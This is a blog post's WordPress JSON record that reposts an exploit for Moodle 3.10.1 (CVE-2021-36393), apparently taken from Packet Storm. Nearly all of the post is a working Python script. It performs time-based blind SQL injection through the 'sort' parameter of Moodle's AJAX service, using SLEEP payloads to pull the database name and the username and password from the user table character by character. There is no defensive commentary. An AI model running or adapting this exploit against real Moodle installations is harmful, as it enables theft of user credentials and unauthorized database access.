{"id":56274,"date":"2024-04-15T22:19:56","date_gmt":"2024-04-15T18:19:56","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178051\/moodle3101-sql.txt"},"modified":"2024-04-15T22:19:56","modified_gmt":"2024-04-15T18:19:56","slug":"moodle-3-10-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/moodle-3-10-1-sql-injection\/","title":{"rendered":"Moodle 3.10.1 SQL Injection"},"content":{"rendered":"<p># Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection &#8211; &#8220;sort&#8221; Parameter<br \/># Google Dork: <br \/># Date: 04\/11\/2023<br \/># Exploit Author: Julio \u00c1ngel Ferrari (Aka. T0X1Cx)<br \/># Vendor Homepage: https:\/\/moodle.org\/<br \/># Software Link: <br \/># Version: 3.10.1<br \/># Tested on: Linux<br \/># CVE : CVE-2021-36393<\/p>\n<p>import requests<br \/>import string<br \/>from termcolor import colored<\/p>\n<p># Request details<br \/>URL = &#8220;http:\/\/127.0.0.1:8080\/moodle\/lib\/ajax\/service.php?sesskey=ZT0E6J0xWe&amp;info=core_course_get_enrolled_courses_by_timeline_classification&#8221;<br \/>HEADERS = {<br \/>&#8220;Accept&#8221;: &#8220;application\/json, text\/javascript, *\/*; q=0.01&#8221;,<br \/>&#8220;Content-Type&#8221;: &#8220;application\/json&#8221;,<br \/>&#8220;X-Requested-With&#8221;: &#8220;XMLHttpRequest&#8221;,<br \/>&#8220;User-Agent&#8221;: &#8220;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.5735.91 Safari\/537.36&#8221;,<br \/>&#8220;Origin&#8221;: &#8220;http:\/\/127.0.0.1:8080&#8221;,<br \/>&#8220;Referer&#8221;: &#8220;http:\/\/127.0.0.1:8080\/moodle\/my\/&#8221;,<br \/>&#8220;Accept-Encoding&#8221;: &#8220;gzip, deflate&#8221;,<br \/>&#8220;Accept-Language&#8221;: &#8220;en-US,en;q=0.9&#8221;,<br \/>&#8220;Cookie&#8221;: &#8220;MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0&#8221;,<br \/>&#8220;Connection&#8221;: &#8220;close&#8221;<br \/>}<\/p>\n<p># Characters to test<br \/>characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + &#8220;!@#$^&amp;*()-_=+[]{}|;:&#8217;\\&#8221;,.&lt;&gt;?\/&#8221;<\/p>\n<p>def test_character(payload):<br \/>response = requests.post(URL, headers=HEADERS, json=[payload])<br \/>return response.elapsed.total_seconds() &gt;= 3<\/p>\n<p>def extract_value(column, label):<br \/>base_payload = {<br \/>&#8220;index&#8221;: 0,<br \/>&#8220;methodname&#8221;: &#8220;core_course_get_enrolled_courses_by_timeline_classification&#8221;,<br \/>&#8220;args&#8221;: {<br \/>&#8220;offset&#8221;: 0,<br \/>&#8220;limit&#8221;: 0,<br \/>&#8220;classification&#8221;: &#8220;all&#8221;,<br \/>&#8220;sort&#8221;: &#8220;&#8221;,<br \/>&#8220;customfieldname&#8221;: &#8220;&#8221;,<br \/>&#8220;customfieldvalue&#8221;: &#8220;&#8221;<br \/>}<br \/>}<\/p>\n<p>result = &#8220;&#8221;<br \/>for _ in range(50): # Assumes a maximum of 50 characters for the value<br \/>character_found = False<br \/>for character in characters_to_test:<br \/>if column == &#8220;database()&#8221;:<br \/>base_payload[&#8220;args&#8221;][&#8220;sort&#8221;] = f&#8221;fullname OR (database()) LIKE &#8216;{result + character}%&#8217; AND SLEEP(3)&#8221;<br \/>else:<br \/>base_payload[&#8220;args&#8221;][&#8220;sort&#8221;] = f&#8221;fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE &#8216;{result + character}%&#8217; AND SLEEP(3)&#8221;<\/p>\n<p>if test_character(base_payload):<br \/>result += character<br \/>print(colored(f&#8221;{label}: {result}&#8221;, &#8216;red&#8217;), end=&#8221;\\r&#8221;)<br \/>character_found = True<br \/>break<\/p>\n<p>if not character_found:<br \/>break<\/p>\n<p># Print the final result<br \/>print(colored(f&#8221;{label}: {result}&#8221;, &#8216;red&#8217;))<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>extract_value(&#8220;database()&#8221;, &#8220;Database&#8221;)<br \/>extract_value(&#8220;username&#8221;, &#8220;Username&#8221;)<br \/>extract_value(&#8220;password&#8221;, &#8220;Password&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection &#8211; &#8220;sort&#8221; Parameter# Google Dork: # Date: 04\/11\/2023# Exploit Author: Julio \u00c1ngel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https:\/\/moodle.org\/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393 import requestsimport stringfrom termcolor import colored # Request detailsURL = &#8220;http:\/\/127.0.0.1:8080\/moodle\/lib\/ajax\/service.php?sesskey=ZT0E6J0xWe&amp;info=core_course_get_enrolled_courses_by_timeline_classification&#8221;HEADERS = {&#8220;Accept&#8221;: &#8220;application\/json, text\/javascript, *\/*; q=0.01&#8221;,&#8220;Content-Type&#8221;: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56274","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56274"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56274\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}